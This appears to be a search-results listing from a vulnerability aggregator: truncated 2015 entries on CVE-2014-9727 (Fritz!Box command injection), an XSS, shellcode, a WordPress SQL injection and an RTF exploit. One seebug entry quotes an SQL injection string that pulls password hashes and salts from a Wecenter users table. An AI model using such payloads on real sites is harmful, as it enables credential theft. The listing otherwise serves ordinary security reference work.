3641 matches found

The Hacker News
added 2015/06/25 1:22 a.m., 8 views

Google Chrome Silently Listening to Your Private Conversations

Google was under fire of downloading and installing a Chrome extension surreptitiously and subsequently listened to the conversations of Chromium users without consent. After these accusations, a wave of criticism by privacy campaigners and open source developers has led Google to remove the...

AI score: 7
Exploits: 0

Kitploit
added 2015/06/23 10:41 p.m., 14 views

VBScan - An Black Box vBulletin Vulnerability Scanner

VBScan is a Black Box vBulletin vulnerability scanner. Written in Perl Demo on youtube: Security Bug Found by VBScan in Ubuntu / Fedora/ python forums by VBScan Vulnerability Scanner Report any bug to : [email protected] Download VBScan...

AI score: 7.2
Exploits: 0, References: 1

0day.today
added 2015/06/17 12:0 a.m., 22 views

linux/x86 seanux-a 1.0 execve shellcode - 80 bytes

seanux-a Linux distribution is an operating system made as a collection of software based around the Linux kernel and often around a package management system. Most distributions come ready to use and pre-compiled for a specific instruction set, while others are distributed in source code form an...

AI score: 0.7
Exploits: 0

Packet Storm
added 2015/06/09 12:0 a.m., 25 views

DreamBox DM500s Cross Site Scripting

DreamBox DM500s Reflected XSS Vendor: Dream Multimedia GmbH Product web page: http://www.dream-multimedia-tv.de Summary: The Dreambox DM500s is a Linux-powered DVB satellite, terrestrial and cable digital television receivers set-top box. Tested on: Linux Kernel 2.6.9, The Gemini Project, Enigma...

AI score: 7.4
Exploits: 0

Tenable Nessus
added 2015/06/09 12:0 a.m., 231 views

MS KB3062760: Update for Vulnerability in Juniper Networks Windows In-Box Junos Pulse Client (FREAK)

The remote Windows host is missing KB3062760, which resolves multiple OpenSSL vulnerabilities in the Juniper Networks Windows In-Box Junos Pulse client shipped with Windows 8.1 : - A flaw exists with ECDH handshakes when using an ECDSA certificate without a ServerKeyExchange message. This allows ...

CVSS: 5, AI score: 7.4, EPSS: 0.98685
Exploits: 0, References: 6

CNVD
added 2015/06/01 12:0 a.m., 5 views

AVM Fritz!Box Arbitrary Command Execution Vulnerability

AVM Fritz!Box is a router product from the German company AVM. The AVM Fritz!Box cgi-bin/webcm URI fails to adequately filter shell metacharacters in the 'var:lang' parameter, presenting an arbitrary command execution vulnerability that could be exploited by a remote attacker to submit a special...

CVSS: 10, AI score: 7.8, EPSS: 0.71642
Exploits: 2, References: 1

NVD
added 2015/05/29 3:59 p.m., 8 views

CVE-2014-9727

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm...

CVSS: 10, AI score: 7.5, EPSS: 0.71642
Exploits: 2, References: 3

Prion
added 2015/05/29 3:59 p.m., 12 views

Design/Logic Flaw

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm...

CVSS: 10, AI score: 8.1, EPSS: 0.71642
Exploits: 2, References: 3

CVE
added 2015/05/29 3:0 p.m., 222 views

CVE-2014-9727

The CVE-2014-9727 issue affects AVM Fritz!Box routers, where the CGI endpoint cgi-bin/webcm accepts the var:lang parameter and does not properly filter shell metacharacters, enabling remote command execution. Impact is remote, unauthenticated command execution against affected devices, with shell...

CVSS: 10, AI score: 7.7, EPSS: 0.71642
In wild, Exploits: 2, References: 3, Affected Software: 1

Cvelist
added 2015/05/29 3:0 p.m., 17 views

CVE-2014-9727

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm...

AI score: 7.5, EPSS: 0.71642
Exploits: 2, References: 3

Positive Technologies
added 2015/05/29 12:0 a.m., 2 views

PT-2015-4366 · Avm · Avm Fritz!Box

Name of the Vulnerable Software and Affected Versions: AVM Fritz!Box affected versions not specified Description: The issue allows remote attackers to execute arbitrary commands. This is achieved by using shell metacharacters in the var:lang parameter to the "cgi-bin/webcm" API endpoint...

CVSS: 10, AI score: 7, EPSS: 0.71642
Exploits: 2, References: 7

ATTACKERKB
added 2015/05/29 12:0 a.m., 655 views

CVE-2014-9727

AVM Fritz!Box allows remote attackers to execute arbitrary commands via shell metacharacters in the var:lang parameter to cgi-bin/webcm. Recent assessments: Assessed Attacker Value: 0...

CVSS: 10, AI score: 7.4, EPSS: 0.71642
In wild, Exploits: 2, References: 4

myhack58
added 2015/05/28 12:0 a.m., 17 views

From the client game bug looking of security risks - vulnerability warning - the black bar safety net

Although the now app development a growing trend in web applications, large-scale software also makes extensive use of the existing framework with the existing frameworks and engines improve, the vast majority of security issues have been resolved. But encountered some customization needs,...

AI score: 7.4
Exploits: 0

Vulnerability Lab
added 2015/05/06 12:0 a.m., 19 views

PDF Converter & Editor 2.1 iOS - File Include Vulnerability

Document Title: PDF Converter & Editor 2.1 iOS - File Include Vulnerability; References Source: http://www.vulnerability-lab.com/getcontent.php?id=1480; Release Date: 2015-05-06; Vulnerability Laboratory ID VL-ID: ...

AI score: 7.1
Exploits: 0

Exploit DB
added 2015/04/21 12:0 a.m., 30 views

WordPress Plugin Community Events 1.3.5 - SQL Injection

title: SQL Injection; product: WordPress Community Events Plugin; vulnerable version: 1.3.5 and probably below; fixed version: 1.4; CVE number: CVE-2015-3313; impact: CVSS Base Score 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P; homepage:...

CVSS: 9.8, AI score: 9.8, EPSS: 0.08342
Exploits: 5

seebug.org
added 2015/03/28 12:0 a.m., 24 views

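Wecenter latest version injection, part 2 (black-box testing techniques)

Brief description: injection that ignores GPC. Details: set the useragent; the injection statement is ' andselect 1 fromselect count,concatselect concatpassword,0x23,salt,0x23 from awsusers limit 0,1,floorrand02x from informationschema.tables group by xa Then leave the page open for a few minutes and visit any page; the error is then visible: Database error ------ SQL: UPDATE awsusersonline SET uid = '2', lastactive ...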

AI score: 7.3
Exploits: 0

myhack58
added 2015/03/25 12:0 a.m., 10 views

CVE-2014-4423 analysis process and findings - vulnerability warning - the black bar safety net

Primer: Some time ago the “steamed rice” on his blog published the article “on a non-jailbroken iPhone 6 iOS 8.1.3 on phishing attacks stealing App Store passwords”, see the article later to try to reproduce the whole process. Since the “steamed rice” the entire process is described more clearly, combi...

AI score: 0.9
Exploits: 0

exploitpack
added 2015/03/18 4:8 p.m., 19 views

Microsoft-Office-Word-2007-RTF

Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass Date : 28/02/2015 Author : R-73eN Software : Microsoft Office Word 2007 Tested : Windows 7 Starter import sys Windows Message Box / all versions shellcode =...

AI score: 0.8
Exploits: 0

myhack58
added 2015/03/05 12:0 a.m., 34 views

dedecms v5.7 files contains lead to arbitrary code execution (tasteless into the background) - bug warning - the black bar safety net

Security box team www.secbox.cn today found the woven dream dedecms a code execution vulnerability, the vulnerability to execute arbitrary code caused getshell, the Affected versions: ≤V5.7SP1 official Edition 2014-06-27 Overview: Security box team in the audit of the woven dream dedecms when foun...

AI score: 0.2
Exploits: 0

exploitpack
added 2015/02/28 12:0 a.m., 14 views

Microsoft Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)

Microsoft Word 2007 - RTF Object Confusion ASLR + DEP Bypass Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass Date : 28/02/2015 Author : R-73eN Software : Microsoft Office Word 2007 Tested : Windows 7 Starter import sys Windows Message Box / all versions . Thanks to...

AI score: 0.3
Exploits: 0